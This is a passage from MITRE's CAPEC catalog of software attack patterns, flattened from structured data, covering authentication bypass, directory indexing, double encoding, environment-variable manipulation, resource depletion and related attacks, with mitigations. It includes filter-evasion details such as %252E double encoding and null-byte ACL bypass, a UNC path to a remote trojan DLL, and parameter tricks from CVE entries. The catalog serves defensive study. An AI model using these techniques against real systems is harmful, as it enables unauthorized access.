supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution. Another example could be API methods that should be disabled in a production application but were not, thus exposing dangerous functionality within a production environment. The target system must expose API functionality in a manner that can be discovered and manipulated by an attacker. This may require reverse engineering the API syntax or decrypting/de-obfuscating client-server exchanges. Medium The requirements vary depending upon the nature of the API. For application-layer APIs related to the processing of the HTTP protocol, one or more of the following may be needed: a MITM (Man-In-The-Middle) proxy, a web browser, or a programming/scripting language. 676 Targeted 1000 Category ChildOf 210 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns. An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way. Medium A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism. 287 Targeted 1000 Category ChildOf 225 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users. An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. Medium A client application, such as a web browser, or a scripting language capable of interacting with the target. 592 Targeted 1000 Category ChildOf 225 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Description Summary An attacker probes the target in a manner that is designed to solicit information relevant to system security. This is achieved by sending data that is syntactically invalid or non-standard relative to a given service, protocol, or expected-input, or by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target. As a result the attacker is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Some exchanges with the target may trigger unhandled exceptions or verbose error messages. When this happens error messages may reveal information like stack traces, configuration information, path information, or database messages. This type of attack also includes manipulation of query strings in a URI, such as by attempting to produce invalid SQL queries or by trying alternative path values, in the hope that the server will return useful information. This attack differs from Data Interception and other data collection attacks in that the attacker actively queries the target rather than simply watching for the target to reveal information. Verbose error handling routines or components that provide the user feedback related to system or application properties. Medium A web browser or a client application capable of sending custom protocol messages, such as a MITM Proxy or a fuzzer, or a similar scanner or packet injection tool. 1000 Category ChildOf 118 CAPEC Content Team MITRE 2013-12-18 Updated Description Summary, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker monitors data streams to or from a target in order to gather information. This attack may be undertaken to gather information to support a later attack or the data collected may be the end goal of the attack. This attack usually involves sniffing network traffic, but may include observing other types of data streams, such as radio. In most varieties of this attack, the attacker is passive and simply observes regular communication, however in some variants the attacker may attempt to initiate the establishment of a data stream or influence the nature of the data transmitted. However, in all variants of this attack, and distinguishing this attack from other data collection methods, the attacker is not the intended recipient of the data stream. Unlike some other data leakage attacks, the attacker is observing explicit data channels (e.g. network traffic) and reading the content. This differs from attacks that collect more qualitative information, such as communication volume, or other information not explicitly communicated via a data stream. All targets that transmit information over a network is potentially vulnerable to this attack. Medium The attacker must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change. 311 Targeted 1000 Category ChildOf 118 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns Attackers aware that more data is being fed into a multicast or public information distribution means can 'select' information bound only for another client, even if the distribution means itself forces users to authenticate in order to connect initially. Doing so allows the attacker to gain access to possibly privileged information, possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could change its identifier from a less privileged to more so privileged channel or command. Determine the nature of messages being transported as well as the identifiers to be used as part of the attack If required, authenticate to the distribution channel If any particular client's information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier. Attackers with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data. Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users. Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves. High Very High A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single "Partners" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack. Low All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages. The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means. Assisted protocol analysis: because the protocol under attack is a public channel, or one in which the attacker likely has authorized access to, they need simply to decode the aspect of channel or message interpretation that codes for message identifiers. Probing is as simple as changing this value and watching its effect. Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages. The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message. Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them. Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity 201 Targeted 306 Secondary 1000 Attack Pattern PeerOf 21 1000 Attack Pattern ChildOf 216 Complete Mediation Use Authentication Mechanisms, Where Appropriate, Correctly Use Authorization Mechanisms Correctly: this refers to Ambiguity of authentication. Many authorization systems use ambiguous symbols (i.e., principal names) to identify principals allowing circumvention of authorization by using a different, though equivalent, principal name. For example, there are many implementations for restricting remote host access to local services that may allow many proper (but apparently different) names for unique hosts (e.g., fully qualified domain names, shortened names, CNAMEs, IPv4 addresses, IPv6 addresses). Penetration Medium Low Low Client-Server n-Tier SOA All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances, Related_Guidelines, Solutions_and_Mitigations The attacker utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. The may allow the attacker to bypass filters that attempt to detect illegal characters or strings, such as might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target. Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an attacker may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An attacker can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc. The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character. Medium Tools that automate encoding of data can assist attackers in generating encoded strings. 1000 Attack Pattern ChildOf 267 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker exploits a sample, demonstration, or test API that is insecure by default and should not be resident on production systems. Some applications include APIs that are intended to allow an administrator to test and refine their domain. These APIs should usually be disabled once a system enters a production environment. Testing APIs may expose a great deal of diagnostic information intended to aid an administrator, but which can also be used by an attacker to further refine their attack. Moreover, testing APIs may not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may have many flaws and vulnerabilities that would allow an attacker to severely disrupt a target. The target must have installed test APIs and failed to secure or remove them when brought into a production environment. High For some APIs, the attacker will need that appropriate client application that interfaces with the API. Other APIs can be executed using simple tools, such as web browsers or console windows. In some cases, an attacker may need to be able to authenticate to the target before it can access the vulnerable APIs. 770 Targeted 1000 Attack Pattern ChildOf 113 An attacker is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An attacker may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the attacker never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the attacker does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level. The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users. The attacker must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources. Medium No special resources are required for this attack beyond the ability to access the target. 732 Targeted 602 Targeted 434 Targeted 1000 Category ChildOf 232 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker manipulates a data buffer to change the execution flow of a process to a sequence of events the attacker controls. Data buffers in software applications provide a storage-space for external input. Buffer attacks provide input the buffer cannot correctly handle. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer by the user is immaterial. Instead, most buffer attacks involve providing more input than the buffer can store, resulting in the overwriting of other program memory or even the program stack with user supplied input. The target must accept input provided by the attacker and store it in a buffer. Medium The attacker must possess a programmatic means for supplying data to a buffer, such as a compiled C or scripted exploit in Perl. Network buffer overflows rely on connectivity of a protocol to deliver the payload. 1000 Category ChildOf 255 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attacker exploits a data structure shared between multiple applications or an application pool to affect application behavior. Data may be shared between multiple applications or between multiple threads of a single application. Data sharing is usually accomplished through mutual access to a single memory location. If an attacker can manipulate this shared data (usually by co-opting one of the applications or threads) the other applications or threads using the shared data will often continue to trust the validity of the compromised shared data and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared data, or even cause a crash or compromise of the sharing applications. The target applications (or target application threads) must share data between themselves. The attacker must be able to manipulate some piece of the shared data either directly or indirectly and the other users of the data must accept the changed data as valid. Medium The attacker must be able to change the shared data. Usually this requires that the attacker be able to compromise one of the sharing applications or threads in order to manipulated the shared data. 682 Targeted 1000 Category ChildOf 255 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow control in management of interactions. Since each request consumes some of the target's resources, if a sufficiently large number of requests must be processed at the same time then the target's resources can be exhausted. The degree to which the attack is successful depends upon the volume of requests in relation to the amount of the resource the target has access to, and other mitigating circumstances such as the target's ability to shift load or acquired additional resources to deal with the depletion. The more protected the resource and the greater the quantity of it that must be consumed, the more resources the attacker may need to have at their disposal. A typical TCP/IP flooding attack is a Distributed Denial-of-Service attack where many machines simultaneously make a large number of requests to a target. Against a target with strong defenses and a large pool of resources, many tens of thousands of attacking machines may be required. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the attacker can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target. Any target that services requests is vulnerable to this attack on some level of scale. Medium A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests. 404 Targeted 770 Targeted 1000 Category ChildOf 119 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An attacker can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks. Directory Discovery Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the attacker is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target. Send requests to the web server for common directory names env-Web If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers. env-All Search for uncommon or potentially user created directories that may be present. env-Web ACLs or other access control mechanisms are present in the application or server configuration that indicate the existence of the directory but the attacker lacks the proper authorization to access the directory (HTTP Status Code 401) env-Web env-ClientServer ACLs or other access control mechanisms are present in the application or server configuration that indicate the existence of the directory, but access is forbidden and authorization will not help. (HTTP Status Code 403) env-Web env-ClientServer The directory exists and can be accessed. HTTP Status Code 200 is the standard code for a successful request env-Web The directory may or may not exist because the server is redirecting the user to another location. HTTP Status codes 301 or 302 indicate the server configuration is redirecting the user to some other page or directory. It cannot be automatically assumed that the location to which the attacker is redirected is the requested directory located elsewhere. env-Web The attacker compiles a list of one or more directories that exist on the server. Some of these directories may not be immediately accessible but they are present. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Block access to the directory listing by setting access control in the .htaccess file. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Iteratively explore directory/file structures The attacker attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes. env-Web Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'. env-Web Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access. env-Web Sequentially request a list of common base files to each directory discovered. env-Web Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a "/" request env-Web There are no normal base files (index.html /home.html /default.html /default.asp /default.asp / index.php) at present env-Web "File not found" error messages along with invalid path name. env-Web The website automatically redirects to the base file. Note that the attacker may still be able to explore the directory listings. env-Web Error 403 Forbidden message displays. The access to directory indexing is blocked by the web server. env-Web A list of files within a requested directory. A "File not found" error messages along with invalid path name. The directory index page shows that there are some sub-directories or files available in the current directory Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Block access to the directory listing by setting access control in the .htaccess file. Automatically redirects to the base file if the request has not given specific filename. Read directories or files which are not intended for public viewing. The attacker attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a "/" request env-Web Try other known exploits to elevate privileges sufficient to bypass protected directories. env-All List the files in the directory by issuing a request with the URL ending in a "/" slash. env-Web Access the files via direct URL and capture contents. env-Web Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access. env-Web Sequentially request a list of common base files to each directory discovered. env-Web A request for the directory name yields a directory listing env-All Either an application or server exploit yields a directory listing env-All Errors 401 or 403 indicate access to directory indexing is blocked by the web server and all methods tried have yielded no success to bypass the ACL or elevate the attackers' privileges. env-All Directory contents are accessible to the attacker. Monitor server logs for unintended file or directory access. Monitor errors (e.g., 404, 401, 403) from web servers, application servers and generate an alert on a disproportionate number of HTTP errors. Identify platform and application-specific sensitive directories and generate logs and alerts for any requests to these resources. Setup ACLs as your operating system, application, and server permit. Consult your server or application documentation for the proper procedure. Automatically redirect to the base file (such as index.html) for the requests without given specific file name. Not allow access to the sensitive files (such as DB dump data) directly. Monitor the volume of failed requests and either deny or redirect requests that appear to be generated by a bot, script, or some other form of scanning tool. Obtain a list of sensitive areas that should not be directly accessible based on your application and server type. Use an external protection device such as a filtering proxy, packet scrubbing load balancer, etc., and frequently update the list of protected areas. The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name. The attacker must be able to control the path that is requested of the target. The deployer must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory. The server version or patch level must not inherently prevent known directory listing attacks from working. Medium High Brute Force API Abuse In this example, the attacker uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80 The target application does not have direct hyperlink to the "backup" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a "db_dump.php" file in it. This sensitive data should not be disclosed publicly. Low To issue the request to URL without given a specific file name High To bypass the access control of the directory of listings Ability to send HTTP requests to a web application. 1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors. 2. Preventing with .htaccess in Apache web server: In .htaccess, write "Options-indexes". 3. Suppressing error messages: using error 403 "Forbidden" message exactly like error 404 "Not Found" message. Confidentiality Read files or directories Information Leakage 424 Targeted 425 Targeted 288 Targeted 285 Targeted 732 Targeted 276 Targeted 693 Targeted 721 Targeted 1000 Category ChildOf 152 http://capec.mitre.org/data/definitions/154.html 1000 Attack Pattern ChildOf 122 All resources must be constrained to be inaccessible by default followed by selectively allowing access to resources as dictated by application and business logic In addition to a central controller, every resource must also restrict, wherever possible, incoming accesses as dictated by the relevant ACL. Failing Securely Least Privilege Reluctance To Trust Complete Mediation Use Authorization Mechanisms Correctly Design Configuration Subsystems Correctly and Distribute Safe Default Configurations Reconnaissance Exploitation Penetration High Low Low Client-Server n-Tier All All All WASC Threat Classification 2.0 WASC-16 - Directory Indexing The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Directory-Indexing John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Min Xu Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. 2007-10-20 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 2007-10-20 Translated Cigital Content to XML and added additional content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Min Xu Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. 2007-10-20 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 2007-10-20 Translated Cigital Content to XML and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats. The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use. The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers. Medium No special resources are required. 682 Targeted 1000 Category ChildOf 255 333 Category HasMember 336 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns This attack involves an attacker manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks. The target application must have a pointer variable that the attacker can influence to hold an arbitrary value. Medium No special resources are required for most forms of this attack. 682 Targeted 1000 Category ChildOf 255 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker. The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc. The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls. The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged resources. An environment variable is accessible to the user. An environment variable used by the application can be tainted with user supplied data. Input data used in an environment variable is not validated properly. The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable. Very High Very High Injection Modification of Resources Protocol Manipulation Environment variables Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\172.16.2.100\shared_files\trojan_dll.dll. Path Manipulation (CVE-1999-0073) Low In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism. Medium High Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it. An attacker can intentionally modify the client side parameter and monitor how the server behaves in response to that modification. For instance an attacker will look at the cookie data, the URL parameters, the hidden variables in forms, variables used in system calls, etc. If the client uses a program in binary format to connect to the server, disassembler can be used to identify parameter within the binary code, and then the attacker would try to simulate the client application and change some of the parameters sent to the server. For instance the attacker may find that a secret key or a path is hard coded in the binary client application. Environment variables are frequently stored in cleartext configuration files. If the attacker can modify those configuration files, he can control the environment variables. Even a read access can potentially be dangerous since this may give sensitive information to perform this type of attack. Indeed knowing which environment variables the application uses is a prerequisite to this type of attack. The attacker may try to obfuscate its attempts to subvert the target process (such as authentication) by using valid values for the variable she controls. By using valid values the user tries to understand the authentication mechanism. This would be in preparation to a more serious attack. Protect environment variables against unauthorized read and write access. Protect the configuration files which contain environment variables against illegitimate read and write access. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Bypass protection mechanism Availability Unexpected State Confidentiality Read application data The client controlled parameter The new value of the client controlled parameter. The activation zone is the server side function where the client controlled parameter is consumed. Consuming an attacker-controlled parameter can defeat the normal process of the application. 353 Targeted 285 Secondary 302 Targeted 74 Targeted 15 Targeted 73 Targeted 20 Secondary 200 Secondary CVE-2006-4244 SQL-Ledger 2.4.4 through 2.6.17 authenticates users by verifying that the value of the sql-ledger-[username] cookie matches the value of the sessionid parameter, which allows remote attackers to gain access as any logged-in user by setting the cookie and the parameter to the same value. CVE-2006-2734 enter.asp in Mini-Nuke 2.3 and earlier makes it easier for remote attackers to conduct password guessing attacks by setting the guvenlik parameter to the same value as the hidden gguvenlik parameter, which bypasses a verification step because the guvenlik parameter is assumed to be immutable by the attacker. CVE-2006-2527 Admin/admin.php in phpBazar 2.1.0 and earlier allows remote attackers to bypass the authentication process and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1. CVE-2006-1505 base_maintenance.php in Basic Analysis and Security Engine (BASE) before 1.2.4 (melissa), when running in standalone mode, allows remote attackers to bypass authentication, possibly by setting the standalone parameter to "yes". 1000 Attack Pattern ChildOf 77 1000 Attack Pattern CanPrecede 14 1000 Attack Pattern PeerOf 10 1000 Attack Pattern ChildOf 264 Reluctance to trust Always perform wise data validation. Do not accept tainted data without validation. Do not simply base authentication on the client controlled parameter. Avoid relying on client side validation only. Penetration Medium High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html [R.13.1][REF-2] Cigital, Inc 2007-03-01 [R.13.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Payload_Activation_Impact An attacker causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request. For example, using an Integer Attack, the attacker could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target. The target must accept service requests from the attacker and the attacker must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the attacker to manipulate variables used in the allocation. Medium No special resources are required for this attack beyond the ability of the attacker to have the target service requests. 770 Targeted 404 Targeted 1000 Category ChildOf 119 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the attacker determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the attacker. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor attacker who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the attacker may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target. The target must have a resource leak that the attacker can repeatedly trigger. Medium No special resources are required beyond the ability to trigger the targeted leak. 404 Targeted 1000 Category ChildOf 119 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to 